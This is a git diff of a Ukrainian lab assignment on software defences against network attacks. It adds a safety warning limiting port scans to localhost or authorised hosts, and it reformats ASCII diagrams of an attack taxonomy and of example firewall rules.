+        <w:left w:type="dxa" w:w="113"/>
+        <w:bottom w:type="dxa" w:w="113"/>
+        <w:right w:type="dxa" w:w="113"/>
+      </w:tblCellMar>
+    </w:tblPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableCaption">
     <w:name w:val="TableCaption"/>

--- a/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
+++ b/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
@@ -51,7 +51,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">ПК з встановленим Wireshark або tcpdump; Доступ до командного рядка з правами адміністратора; C++ компілятор для написання утиліт; Віртуальна машина (опціонально, для безпечних експериментів).</w:t>
+        <w:t xml:space="preserve">ПК з встановленим Wireshark або tcpdump; Доступ до командного рядка з правами адміністратора; Компілятор або інтерпретатор мови програмування за вибором студента; Віртуальна машина (опціонально, для безпечних експериментів).</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
+++ b/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
@@ -70,6 +70,60 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve">2 академічні години.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">УВАГА.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Робота змінює правила брандмауера й сканує порти. Виконуйте її у віртуальній машині або на власному комп’ютері, сканувати дозволено лише</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">127.0.0.1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">та вузли, на які є письмовий дозвіл власника: несанкціоноване сканування чужих систем порушує закон. Перед зміною правил збережіть поточні (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">iptables-save</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">netsh advfirewall export</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">), а наприкінці роботи видаліть усі створені правила.</w:t>
       </w:r>
     </w:p>
     <w:bookmarkStart w:id="14" w:name="теоретичні-відомості"/>
@@ -135,241 +189,241 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                        │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                            │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                               │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                                 │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                     │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │                                                                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                              │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │   ├── SYN Flood                                                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │   ├── UDP Flood                                                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │   └── Amplification attacks                                        │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │                                                                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                        │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│      ├── Сканування портів                                            │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│      ├── Сканування вразливостей                                      │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│      └── DNS enumeration                                              │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                   │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                               │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                     │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
+              <w:t xml:space="preserve">┌─────────────────────────────────────────────────────────────────────┐</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                      │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">├─────────────────────────────────────────────────────────────────────┤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                          │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                             │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                   │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │                                                                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                            │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── SYN Flood                                                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── UDP Flood                                                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   └── Amplification attacks                                      │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │                                                                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                      │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      ├── Сканування портів                                          │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      ├── Сканування вразливостей                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      └── DNS enumeration                                            │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                 │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                             │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                   │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">└─────────────────────────────────────────────────────────────────────┘</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -670,169 +724,196 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                          │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                    │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  Приклад набору правил:                                               │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │ 1. ALLOW TCP dst-port=443 (HTTPS)                               │  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=80  (HTTP)                                │  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │ 3. ALLOW UDP dst-port=53  (DNS)                                 │  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        │  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 │  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘  │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного   │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">│                                                                       │</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
+              <w:t xml:space="preserve">┌─────────────────────────────────────────────────────────────────────┐</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">├─────────────────────────────────────────────────────────────────────┤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Приклад набору правил:                                             │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐│</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 1. ALLOW state=ESTABLISHED,RELATED (відповіді на наші запити)   ││</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=443 (HTTPS)                               ││</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 3. ALLOW TCP dst-port=80  (HTTP)                                ││</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        ││</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 ││</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
